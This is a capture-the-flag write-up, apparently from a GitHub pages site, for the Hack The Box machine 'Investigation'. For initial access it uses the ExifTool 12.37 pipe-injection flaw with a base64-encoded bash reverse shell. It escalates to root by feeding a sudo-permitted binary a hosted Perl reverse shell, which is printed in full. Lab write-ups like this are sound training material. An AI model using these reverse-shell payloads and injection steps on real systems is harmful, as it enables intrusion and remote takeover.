HackTheBox

Writeups for the Hack The Box machines

View on GitHub

image

https://app.hackthebox.com/machines/Investigation

Enuemration :

I started with a quick rustscan and observed only two open ports on the network: 22 and 80.

image

Here are the results of the port scan:

Port 22: OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
Port 80: Apache httpd 2.4.41

In the port scan results, I found a domain as well: http://eforenzics.htb/, which I added to my /etc/hosts file. I browsed through the website and found an option to upload images for forensics results.

image image

Then, I proceeded with the subdomain scanning of the webserver and found only one result: ‘/assets’.

image

I then tried to access ‘/assets’, but received a 403 error.

Next, I tried to upload a ‘.php’ file in the hope of getting a shell, but the filters were blocking uploads other than ‘.jpg’ and ‘.png’. I tried many filters to bypass them, but none of them worked.

image

After multiple failures, I uploaded a regular PNG image and it gave me the forensics results of the image.

image

I observed that the website was using ExifTool ver 12.37 for image forensics purposes.

image

Searching for an exploit for this version, I landed on this page, which states: “An attacker can pass a filename that ends with a pipe ( ) to exiftool and if it exists on the filesystem, execute it as an operating system command.”

I tried the same using Burp Suite to test it. First, I started ‘tcpdump’ and an ‘ICMP’ server to check if I received any response from the machine or not. I got a response from the host

sudo tcpdump icmp -i tun0 -v

image

After the confirmation that the website is responding & exiftool is vulnerable now it’s time for the Rev Shell.

Initial access :

I tried injecting the regular bash payload for reverse shell but didn’t receive any shell, there may be some filters running on the website. I then encoded the payload in base64 format & appended the decode function after it, allowing us to execute the payload as well.

echo 'YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC41NS81MyAwPiYxCg==' | base64 -d | bash|

image

This time, I received the reverse shell with the user ‘www-data’ running and then stabilized the shell.

I found a user folder named ‘smorton’ in the home directory, but I did not have access to it.

image

I then tried to check for the vectors of priv esc. However, some of the methods required a user password which I did not have. I then ran ‘linpeas’ to check for possible priv esc vectors, I found a cronjob running from ‘/usr/bin/crontab’ which is performing some activity in this folder ‘/usr/local/investigation/analysed_log

image

I then began exploring the ‘/usr/local/investigation/’ path and discovered a .msg file called ‘Windows Event Logs for Analysis.msg’. I transferred this file into my machine & checked it’s content online as I don’t have any email reader in kali machine.

image

I also downloaded the email attachment onto my machine. After unzipping the attachment I got another file ‘security.evtx’ which is a Windows log event file.

image

I tried to read it’s content but it is not in a human-readable format. So, then I used a script from this GitHub repo to dump the file in the humand readable format.

image image

When checking the dump file, I found some credentials in that dump file. As the dump file is too big I used the event code ‘4776’ to check for any interesting strings.

Event ID 4776 is a security-related event that is logged when a computer attempts to authenticate a user account using Kerberos authentication. This event is triggered when an authentication attempt fails, and helps identify where the failure occurred.

image

User flag:

I tried logging in with the credentials I gathered using the ‘Smorton’ account and successfully accessed SSH. (pwn3d!🙂)

image

Once logged in, I found the user flag in the ‘smorton’ home directory.

image

Priv Esc:

I started with manual enumeration and checked the ‘sudo’ permissions using the ‘sudo -l’ command, which returned the following:

image

Next, I used the ‘string’ command to check the ‘binary’ file, but the information in it was not clear:

image

At this point, I was stuck and ran LinPeas to find other possible vectors, but found none. I searched for hints online and found this walkthrough

In the blog, I found that the author uploaded the binary file to online decompile and reviewed the source code.

They extracted the main function of the binary, which can be seen in the following code:

```int32_t main(int32_t argc, char** argv, char** envp) { if (argc != 3) { puts(“Exiting… “); exit(0); /* no return / } if (getuid() != 0) { puts(“Exiting… “); exit(0); / no return / } if (strcmp(argv[2], “lDnxUysaQn”) != 0) { puts(“Exiting… “); exit(0); / no return / } puts(“Running… “); FILE rax_8 = fopen(argv[2], &data_2027); int64_t rax_9 = curl_easy_init(); int32_t var_40 = 0x2712; curl_easy_setopt(rax_9, 0x2712, argv[1], 0x2712); int32_t var_3c = 0x2711; curl_easy_setopt(rax_9, 0x2711, rax_8, 0x2711); int32_t var_38 = 0x2d; curl_easy_setopt(rax_9, 0x2d, 1, 0x2d); if (curl_easy_perform(rax_9) != 0) { puts(“Exiting… “); exit(0); /* no return / } int64_t rax_25 = snprintf(nullptr, 0, &data_202a, argv[2]); char rax_28 = malloc((rax_25 + 1)); snprintf(rax_28, (rax_25 + 1), &data_202a, argv[2]); int64_t rax_37 = snprintf(nullptr, 0, “perl ./%s”, rax_28); char* rax_40 = malloc((rax_37 + 1)); snprintf(rax_40, (rax_37 + 1), “perl ./%s”, rax_28); fclose(rax_8); curl_easy_cleanup(rax_9); setuid(0); system(rax_40); system(“rm -f ./lDnxUysaQn”); return 0; }


Firstly, it checks whether three input parameters have been sent through (actually two because the first parameter is the program name itself) and exits if not.

Secondly, it checks whether a root user calls it (achievable because we can run it as root without a password) and exits if not.

Thirdly, it checks whether the third parameter is equal to the string lDnxUysaQn, and exits if not.

Fourthly, it opens a file with curl which is specified by the second parameter and reads and runs with perl.

And it can be seen that the machine would send the get request to the specified URL.

![image](https://user-images.githubusercontent.com/87700008/221631208-5a9a09bf-9176-430e-b33e-0f9dda4d9412.png)

I then hosted a perl based revsershell in my kali machine :

``` use Socket;
$i="[My_IP_here]";
$p=53;
socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
if(connect(S,sockaddr_in($p,inet_aton($i)))){
 open(STDIN,">&S");open(STDOUT,">&S");
 open(STDERR,">&S");exec("/bin/bash -i");
};

I then executed the command & got the shell. (pwn3d!🙂)

sudo /usr/bin/binary 10.10.X.X/shell.pl lDnxUysaQn

image